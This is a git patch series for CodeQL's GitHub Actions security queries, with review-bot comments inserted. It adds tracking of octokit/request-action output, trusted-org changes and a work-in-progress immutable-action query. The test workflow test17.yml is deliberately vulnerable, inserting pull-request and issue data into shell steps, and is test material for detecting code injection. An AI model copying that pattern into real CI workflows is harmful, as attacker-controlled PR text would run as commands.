@@ -295,3 +295,24 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { override string getSourceType() { result = "text" } } + +class OctokitRequestActionSource extends RemoteFlowSource { + OctokitRequestActionSource() { + exists(UsesStep u, string route | + u.getCallee() = "octokit/request-action" and + route = u.getArgument("route").trim() and + route.indexOf("GET") = 0 and + ( + route.matches("%/commits%") or + route.matches("%/comments%") or + route.matches("%/pulls%") or + route.matches("%/issues%") or + route.matches("%/users%") or + route.matches("%github.event.issue.pull_request.url%") + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } +} diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll index e9d5a44c929..80858df909b 100644 --- a/ql/lib/codeql/actions/dataflow/TaintSteps.qll +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll 
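Review bot: `OctokitRequestActionSource` is added without QLDoc, and its route filter is a list of unanchored substring tests (`%/commits%`, `%/users%`, and so on) whose intent a maintainer has to guess. A doc comment such as `/** An octokit/request-action step whose GET route reads commits, comments, pulls, issues or users, so its response may hold externally controlled text. */` would record why these routes were chosen. Note also that `route.indexOf("GET") = 0` is case-sensitive, so a lower-case method would not be recognised if the action accepts one (not shown here).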
@@ -91,11 +91,45 @@ predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node ) } +/** + * A read of user-controlled field of the octokit/request-action action. + */ +predicate octokitRequestActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof OctokitRequestActionSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + succ.asExpr() = o and + ( + not o instanceof JsonReferenceExpression and + o.getFieldName() = "data" + or + o instanceof JsonReferenceExpression and + o.(JsonReferenceExpression).getInnerExpression().matches("%.data") and + o.(JsonReferenceExpression) + .getAccessPath() + .matches([ + "%.title", + "%.user.login", + "%.body", + "%.head.ref", + "%.head.repo.full_name", + "%.commit.author.email", + "%.commit.commiter.email", + "%.commit.message", + "%.email", + "%.name", + ]) + ) + ) +} + class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { dornyPathsFilterTaintStep(node1, node2) or tjActionsChangedFilesTaintStep(node1, node2) or tjActionsVerifyChangedFilesTaintStep(node1, node2) or - xt0rtedSlashCommandActionTaintStep(node1, node2) + xt0rtedSlashCommandActionTaintStep(node1, node2) or + octokitRequestActionTaintStep(node1, node2) } } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml new file mode 100644 index 00000000000..559c69c4710 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml 
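Review bot: In `octokitRequestActionTaintStep` the access-path pattern `"%.commit.commiter.email"` is misspelled, so it can never match the committer field it appears to target; it should read `"%.commit.committer.email",`. The miss is currently masked because `"%.email"` later in the list matches every path ending in `.email`, which also makes both `%.commit.*.email` entries redundant. `"%.name"` is similarly broad. The QLDoc should say whether the list is meant as specific fields or as suffixes, so that later edits do not silently narrow or widen the taint step.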
@@ -0,0 +1,74 @@ +name: Test + +on: + issue_comment: + +permissions: + contents: read + pull-requests: write + +jobs: + setup: + runs-on: ubuntu-latest + steps: + - name: Get PR details + id: get-pr + if: github.event_name == 'issue_comment' + uses: octokit/request-action@v2.x + with: + route: GET /repos/${{ github.repository }}/pulls/${{ github.event.issue.number }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Set PR source branch as env variable + if: github.event_name == 'issue_comment' + run: | + PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') + echo "BRANCH=$PR_SOURCE_BRANCH" >> $GITHUB_ENV + setup2: + runs-on: ubuntu-latest + steps: + - name: Get PR details + uses: octokit/request-action@v2.x + id: get-pr-details + with: + route: GET /repos/{repository}/pulls/{pull_number} + repository: ${{ github.repository }} + pull_number: ${{ github.event.issue.number }} + env: + GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} + - name: Set environment variables + run: | + MERGE_STATUS=${{ fromJson(steps.get-pr-details.outputs.data).mergeable }} + if $MERGE_STATUS; then echo "COMMENT=\[Fast Forward CI\] ${{ env.HEAD_REF }} cannot be merged into ${{ env.BASE_REF }} at the moment." 
>> $GITHUB_ENV; fi + echo "MERGE_STATUS=$MERGE_STATUS" >> $GITHUB_ENV + echo "BASE_REF=${{ fromJson(steps.get-pr-details.outputs.data).base.ref }}" >> $GITHUB_ENV + echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV + setup3: + runs-on: ubuntu-latest + steps: + - id: issues + uses: octokit/request-action@v2.x + with: + route: GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues?state=open + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}} + - run: | + echo '${{ steps.issues.outputs.data }}' > issues.json + setup4: + runs-on: ubuntu-latest + steps: + - id: get-pull-request + uses: octokit/request-action@v2.x + with: + route: GET /repos/{owner}/{repo}/pulls/{pull_number} + owner: foo + repo: bar + pull_number: ${{ github.event.issue.number }} + + - run: >- + echo "Pull request title is \"${{ + fromJson(steps.get-pull-request.outputs.data).title }}\" but expected + \"Updated test pull request\"" && exit 1 + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 699d53da9cc..1ad0d498791 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -155,6 +155,10 @@ edges | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | provenance | | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -472,6 +476,14 @@ nodes | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | semmle.label | Uses Step: get-pr | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | semmle.label | steps.get-pr.outputs.data | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | semmle.label | Uses Step: get-pr-details | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | semmle.label | fromJson(steps.get-pr-details.outputs.data).head.ref | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -623,6 +635,10 @@ subpaths | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 6d33d3cc569..eb852fdd4d2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -155,6 +155,10 @@ edges | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | provenance | | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -472,6 +476,14 @@ nodes | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | semmle.label | Uses Step: get-pr | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | semmle.label | steps.get-pr.outputs.data | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | semmle.label | Uses Step: get-pr-details | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | semmle.label | fromJson(steps.get-pr-details.outputs.data).head.ref | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From c44c3bae9fffad54b3b72e3a2a7f0ccd4d1fcafd Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 21:39:58 +0200 Subject: [PATCH 0595/1267] Update tests --- ql/test/library-tests/commands.expected | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected index 12092de34ef..35305671cf0 100644 --- a/ql/test/library-tests/commands.expected +++ b/ql/test/library-tests/commands.expected @@ -195,6 +195,8 @@ | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | echo "foo" | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | echo "foo" | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | From 7cba2e07bc232808a5dbc2ec08b044ec2d3c8097 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 21:40:40 +0200 Subject: [PATCH 0596/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 12cf4c6106a..e5471e23651 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.68 +version: 0.1.69 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b10da74b711..660f3287090 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.68 +version: 0.1.69 groups: [actions, queries] suites: codeql-suites extractor: javascript From 325727ed6dc6ccc0f7bd2e8ed70084a574f3c7f9 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 17 Oct 2024 15:59:45 -0400 Subject: [PATCH 0597/1267] recommend to add octokit to trusted orgs --- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 10c21bc368b..2111cc118a9 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -18,7 +18,7 @@ private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f bindingset[repo] private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) + exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) } from UsesStep uses, string repo, string version, Workflow workflow, string name From cf9b853a8fba8dac3be1f6d173caf4673edaed2c Mon Sep 17 00:00:00 2001 
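Review bot: Adding `"octokit"` to the list in `isTrustedOrg` exempts every action published under that organisation from the unpinned-tag check, and the predicate has no comment saying what qualifies an org as trusted. If the intent is only to stop flagging `octokit/request-action`, match that repository instead, for example `or repo = "octokit/request-action"`. Otherwise add a line such as `// Orgs whose actions are all exempt from the commit-pinning requirement.` above the list so the scope of the exemption is explicit. The changed line is also long enough that it should be wrapped by the formatter.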
From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 17 Oct 2024 16:14:03 -0400 Subject: [PATCH 0598/1267] unversioned immutable actions wip --- ql/lib/codeql/actions/config/Config.qll | 11 ++++++ .../actions/config/ConfigExtensions.qll | 7 ++++ ql/lib/ext/config/immutable_actions.yml | 22 +++++++++++ .../CWE-829/UnversionedImmutableAction.md | 27 +++++++++++++ .../CWE-829/UnversionedImmutableAction.ql | 38 +++++++++++++++++++ 5 files changed, 105 insertions(+) create mode 100644 ql/lib/ext/config/immutable_actions.yml create mode 100644 ql/src/Security/CWE-829/UnversionedImmutableAction.md create mode 100644 ql/src/Security/CWE-829/UnversionedImmutableAction.ql diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 82b7a53a9d7..a439f999623 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -119,6 +119,17 @@ predicate vulnerableActionsDataModel( Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version) } +/** + * MaD models for vulnerable actions + * Fields: + * - action: action name + */ +predicate immutableActionsDataModel( + string action +) { + Extensions::immutableActionsDataModel(action) +} + /** * MaD models for untrusted git commands * Fields: diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index a32e9c445f2..c36ad046a3c 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -58,6 +58,13 @@ extensible predicate vulnerableActionsDataModel( string action, string vulnerable_version, string vulnerable_sha, string fixed_version ); +/** + * Holds for actions that are known to be immutable. + */ +extensible predicate immutableActionsDataModel( + string action +); + /** * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. */ 
diff --git a/ql/lib/ext/config/immutable_actions.yml b/ql/lib/ext/config/immutable_actions.yml new file mode 100644 index 00000000000..072e8ed0b09 --- /dev/null +++ b/ql/lib/ext/config/immutable_actions.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: immutableActionsDataModel + data: + - ["actions/checkout"] + - ["actions/cache"] + - ["actions/setup-node"] + - ["actions/upload-artifact"] + - ["actions/setup-python"] + - ["actions/download-artifact"] + - ["actions/github-script"] + - ["actions/setup-java"] + - ["actions/setup-go"] + - ["actions/upload-pages-artifact"] + - ["actions/deploy-pages"] + - ["actions/setup-dotnet"] + - ["actions/stale"] + - ["actions/labeler"] + - ["actions/create-github-app-token"] + - ["actions/configure-pages"] + - ["octokit/request-action"] diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md new file mode 100644 index 00000000000..eab708f8602 --- /dev/null +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md 
@@ -0,0 +1,27 @@ +# Unpinned tag for 3rd party Action in workflow + +## Description + +Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + +## Recommendations + +Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. + +## Examples + +### Incorrect Usage + +```yaml +- uses: tj-actions/changed-files@v44 +``` + +### Correct Usage + +```yaml +- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44 +``` + +## References + +- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql new file mode 100644 index 00000000000..d9a1394641f --- /dev/null +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql 
@@ -0,0 +1,38 @@ +/** + * @name Unversioned Immutable Action + * @description Using an Immutable Action without a semantic version tag opts out of the protections of Immutable Action + * @kind problem + * @security-severity 5.0 + * @problem.severity recommendation + * @precision high + * @id actions/unversioned-immutable-action + * @tags security + * actions + * external/cwe/cwe-829 + */ + +import actions + +bindingset[version] +private predicate isSemanticVersioned(string version) { version.regexpMatch("^v[0-9]+(\\.[0-9]+)*(\\.[xX])?$") } + +bindingset[repo] +private predicate isTrustedOrg(string repo) { + exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) +} + +from UsesStep uses, string repo, string version, Workflow workflow, string name +where + uses.getCallee() = repo and + uses.getEnclosingWorkflow() = workflow and + ( + workflow.getName() = name + or + not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name + ) and + uses.getVersion() = version and + not isTrustedOrg(repo) and + not isPinnedCommit(version) +select uses.getCalleeNode(), + "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + + "', not a pinned commit hash", uses, uses.toString() From e5508343b197f0bca8dff57e5fe97f41d0bf31f9 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Fri, 18 Oct 2024 15:21:33 -0400 Subject: [PATCH 0599/1267] update unpinned actions tag test --- .../query-tests/Security/CWE-829/UnpinnedActionsTag.expected | 3 --- 1 file changed, 3 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index d05c7bebc07..a9e5134b28e 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -10,9 +10,6 @@ | .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash 
| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:15:36:47 | rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | From 2d5cd1a61a978417e8c20cf13febd4680823be97 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Fri, 18 Oct 2024 16:51:31 -0400 Subject: [PATCH 0600/1267] WIP. todo: modify help text in query to be helpful, write qlhelp file, find out how to not release to customers --- 